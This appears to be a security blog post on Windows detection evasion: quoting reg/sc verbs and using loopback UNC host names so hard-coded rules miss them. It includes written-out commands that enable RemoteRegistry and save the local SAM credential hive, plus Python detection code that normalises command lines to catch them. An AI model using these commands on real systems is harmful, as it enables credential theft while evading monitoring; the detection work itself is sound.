Many Windows command-line tools take a subcommand (a verb) as their first argument, f.ex.:
- reg.exe – QUERY, ADD, DELETE, COPY, SAVE, RESTORE, LOAD, UNLOAD, COMPARE, EXPORT, IMPORT, FLAGS
- sc.exe – config, continue, control, create, delete, description, EnumDepend, failure, failureflag, GetDisplayName, GetKeyName, interrogate, managedaccount, pause, preferrednode, privs, qc, qdescription, qfailure, qfailureflag, qmanagedaccount, qpreferrednode, qprivs, qprotection, qsidtype, qtriggerinfo, query, queryex, quserservice, sdset, sdshow, showsid, sidtype, start, stop, triggerinfo
- netsh.exe – ?, add, advfirewall, branchcache, bridge, delete, dhcpclient, dnsclient, dump, exec, firewall, help, http, interface, ipsec, lan, mbn, namespace, netio, p2p, ras, rpc, set, show, trace, wcn, wfp, winhttp, winsock, wlan
- fsutil.exe – 8dot3name, behavior, dax, dirty, file, fsInfo, hardlink, objectID, quota, repair, reparsePoint, resource, sparse, storageReserve, tiering, transaction, usn, volume, wim
We are used to invoking them in the form tool command, but there is an alternative: the subcommand can be wrapped in double quotes, f.ex.:
- reg.exe "query" is identical with reg.exe query
- sc.exe "start" is identical with sc start
- etc.
This breaks many hard-coded detections. The quotes are stripped by the tool's own argument parsing, so reg.exe still sees the verb query, but the command line recorded by the process-creation log (Sysmon, EDR, 4688) is the raw string, quotes included. A rule that looks for the literal substring reg query will not match reg "query".
The second trick is the near-universal support for everything 'remote', that is, operations that can be executed against other endpoints.
As such, one can use computer names in many of these commands, f.ex. registry keys passed to reg.exe can be prefixed with a host name. This includes the local machine under its loopback names: localhost, 127.0.0.1 and ::1. Notably, for these to work the RemoteRegistry service needs to be running on the local host (and saving the SAM hive still requires administrative privileges either way). Enabling the service is easy:
sc config remoteregistry start= auto
sc start remoteregistry
and then we can easily run one of these:
reg save \\127.0.0.1\hklm\sam sam
reg save \\localhost\hklm\sam sam
reg save \\::1\hklm\sam sam
reg "save" \\127.0.0.1\hklm\sam sam
reg "save" \\localhost\hklm\sam sam
reg "save" \\::1\hklm\sam sam
This will break many detections too: the key argument no longer starts with HKLM\ and the verb may be quoted, yet the hive being saved is still the local SAM.
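The following is an added example, not code from the original post, showing why substring rules miss both tricks and how a detection that normalises the command line first survives them. It tokenises the raw command line the way the Microsoft C runtime does (simplified: whitespace separates arguments, double quotes group and are removed, backslashes are literal), collapses loopback host prefixes on registry paths, canonicalises HKEY_LOCAL_MACHINE to HKLM, and only then matches. The sample command lines are constructed for this example, as a Sysmon or EDR CommandLine field would record them; the function names and the finding strings are my own, not from any product.

```python
import re

# Hosts that reg.exe accepts as a "remote" target but which resolve to the
# machine the command runs on (needs the RemoteRegistry service, as above).
LOOPBACK_HOSTS = {"localhost", "::1"}

# Constructed sample command lines (not real telemetry), written as a
# process-creation log records them: the raw string, quotes included.
SAMPLE_COMMAND_LINES = [
    r'reg save hklm\sam sam',
    r'reg "save" hklm\sam sam',
    r'reg save \\127.0.0.1\hklm\sam sam',
    r'reg "save" \\::1\hklm\sam sam',
    r'C:\Windows\System32\reg.exe "SAVE" \\localhost\HKEY_LOCAL_MACHINE\SAM C:\Users\Public\sam.hiv',
    r'reg save \\fileserver01\hklm\sam sam',
    r'sc "config" RemoteRegistry start= auto',
    r'reg query hklm\software\microsoft\windows\currentversion\run',
]


def naive_detect(cmdline):
    """The hard-coded substring match that the two tricks above defeat."""
    return r"reg save hklm\sam" in cmdline.lower()


def split_cmdline(cmdline):
    """Split a raw Windows command line into the argv the tool itself sees.
    Simplified CRT rules: whitespace separates, double quotes group and are
    dropped, backslashes are literal (sufficient for reg/sc/netsh syntax)."""
    tokens, cur, in_quote, pending = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quote, pending = not in_quote, True
        elif ch.isspace() and not in_quote:
            if pending:
                tokens.append("".join(cur))
                cur, pending = [], False
        else:
            cur.append(ch)
            pending = True
    if pending:
        tokens.append("".join(cur))
    return tokens


def is_loopback(host):
    host = host.lower().strip("[]")
    return host in LOOPBACK_HOSTS or host.startswith("127.")


def split_reg_key(arg):
    """Return (key, host): strip a \\host\ prefix, treat loopback hosts as no
    host at all, and canonicalise HKEY_LOCAL_MACHINE to HKLM."""
    host = None
    m = re.fullmatch(r"\\\\([^\\]+)\\(.*)", arg)
    if m:
        host, arg = m.group(1).lower(), m.group(2)
        if is_loopback(host):
            host = None
    key = arg.lower()
    if key.startswith("hkey_local_machine\\"):
        key = "hklm\\" + key[len("hkey_local_machine\\"):]
    return key, host


def detect(cmdline):
    """Match on normalised argv instead of the raw string; returns a finding
    string or None."""
    tokens = split_cmdline(cmdline)
    if len(tokens) < 3:
        return None
    image = tokens[0].lower().rsplit("\\", 1)[-1]
    image = image[:-4] if image.endswith(".exe") else image
    args = [t.lower() for t in tokens[1:]]
    if image == "sc" and args[0].startswith("\\\\"):
        args = args[1:]  # sc.exe \\server verb ... form
    if image == "reg" and args[0] == "save":
        key, host = split_reg_key(args[1])
        if key in ("hklm\\sam", "hklm\\security", "hklm\\system"):
            return "reg save of %s on %s" % (key, host or "local machine")
    if image == "sc" and len(args) >= 2 and args[0] in ("config", "start") \
            and args[1] == "remoteregistry":
        return "sc %s of remoteregistry" % args[0]
    return None


def scan(cmdlines):
    """Run both detections; returns (cmdline, naive_hit, normalised_finding)."""
    return [(c, naive_detect(c), detect(c)) for c in cmdlines]


if __name__ == "__main__":
    for cmdline, naive, finding in scan(SAMPLE_COMMAND_LINES):
        print("naive=%-5s normalised=%-40s %s" % (naive, finding, cmdline))
```

Of the eight constructed lines, the substring rule fires on the first one only; the normalised rule flags all five local SAM saves identically, keeps the genuinely remote fileserver01 case as a separate finding with its host, catches the quoted sc "config" of RemoteRegistry, and ignores the benign reg query. The point is that matching should happen on what the tool parses, not on what the shell wrote.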